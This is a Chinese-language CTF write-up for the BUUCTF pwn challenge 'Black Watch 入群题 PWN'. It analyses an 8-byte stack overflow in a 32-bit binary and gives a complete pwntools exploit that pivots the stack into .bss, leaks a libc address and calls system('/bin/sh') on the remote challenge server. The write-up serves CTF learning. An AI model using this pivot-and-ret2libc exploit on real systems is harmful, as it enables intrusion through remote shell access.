Black Watch 入群题 PWN
# Black Watch 入群题 PWN
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/Black_Watch_入群题_PWN/spwn'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
# 静态分析
主函数如下
// Decompiler output (kept verbatim): the entry point calls the vulnerable
// routine once and then prints a farewell before returning 0.
int __cdecl main(int argc, const char **argv, const char **envp)
{
vul_function();
puts("GoodBye!");
return 0;
}
vul_function函数如下
// Decompiler output (kept verbatim). Prints two prompts (m1, m2 are globals
// defined elsewhere) and reads two inputs; returns the byte count of the
// second read().
ssize_t vul_function()
{
size_t v0; // eax
size_t v1; // eax
char buf[24]; // [esp+0h] [ebp-18h] BYREF
v0 = strlen(m1);
write(1, m1, v0);
// First input: up to 0x200 bytes into the global `s` (in .bss per the
// analysis below); attacker-controlled data thus lands at a fixed address
// since the binary is not PIE.
read(0, &s, 0x200u);
v1 = strlen(m2);
write(1, m2, v1);
// Second input: 0x20 (32) bytes into a 24-byte stack buffer at ebp-0x18, an
// 8-byte stack overflow that covers the saved ebp and the return address.
// Bounding the length to sizeof(buf) would remove the overflow.
return read(0, buf, 0x20u);
}
# 思路分析
- 目前信息:
  - vul_function 函数可溢出 8 个字节, s 在 bss 段
  - 无 system、/bin/sh 与后门函数
  - No canary found
  - NX enabled
  - No PIE
- 思路:
  - 只能溢出少量字节,选择使用栈迁移的手法,将栈迁移到 s 所在的 bss 段上,接着泄漏 libc 和函数地址,再构造 rop 链获得 shell
# exp
from pwn import *
from LibcSearcher import *
# 32-bit target; matches the checksec output above (i386, No PIE, no canary, NX on).
context(os='linux', arch='i386', log_level='debug')
pwnfile = '/root/pwn/buuctf/Black_Watch_入群题_PWN/spwn'
io = remote('node4.buuoj.cn', 28817)
# io = process(pwnfile)
elf = ELF(pwnfile)
# Offset from the start of `buf` (ebp-0x18) to the saved return address:
# 0x18 bytes of buffer + 4 bytes of saved ebp.
padding = 0x1c
# Address of the global `s` in .bss that the first read() fills (up to 0x200 bytes).
# Because the overflow of `buf` is only 8 bytes, the stack is pivoted here.
bss_s_addr = 0x0804A300
# `leave; ret` gadget used for the pivot (address taken from the binary, which is not PIE).
leave_ret = 0x08048511
write_plt = elf.plt['write']
libc_start_main_got = elf.got['__libc_start_main']
main_addr = elf.symbols['main']
# Fake frame written into `s`:
#   [fake ebp][write@plt][return -> main][fd=1][&__libc_start_main@got][len=4]
# i.e. write(1, got_entry, 4) leaks a libc pointer, then execution returns to main.
payload = flat([bss_s_addr+0x200, write_plt,main_addr, 1, libc_start_main_got, 4])
io.sendafter('What is your name?', payload)
# 8-byte overflow of `buf`: saved ebp <- &s, return address <- leave;ret.
# The function's own epilogue loads ebp = &s; the gadget then moves esp to &s,
# pops the fake ebp and returns into write@plt.
payload = flat(['a'*(padding-4), bss_s_addr, leave_ret])
io.sendafter('What do you want to say?', payload)
# The leaked GOT entry arrives before main's next prompt, so the first 4 bytes are the pointer.
leak_libc_start_main = u32(io.recv(4))
success("leak_libc_start_main:"+hex(leak_libc_start_main))
# Resolve the remote libc from the leaked symbol and compute its base.
libc = LibcSearcher('__libc_start_main', leak_libc_start_main)
libc_base = leak_libc_start_main-libc.dump('__libc_start_main')
system = libc_base+libc.dump('system')
bin_sh = libc_base+libc.dump('str_bin_sh')
# Second fake frame in `s`: [fake ebp][system][return (unused)][&"/bin/sh"]
payload = flat([bss_s_addr+0x200, system, 0xdeadbeef, bin_sh])
io.sendafter('What is your name?', payload)
# Same pivot as above.
payload = flat(['a'*(padding-4), bss_s_addr, leave_ret])
io.sendafter('What do you want to say?', payload)
io.interactive()
上次更新: 2022/08/15, 00:29:49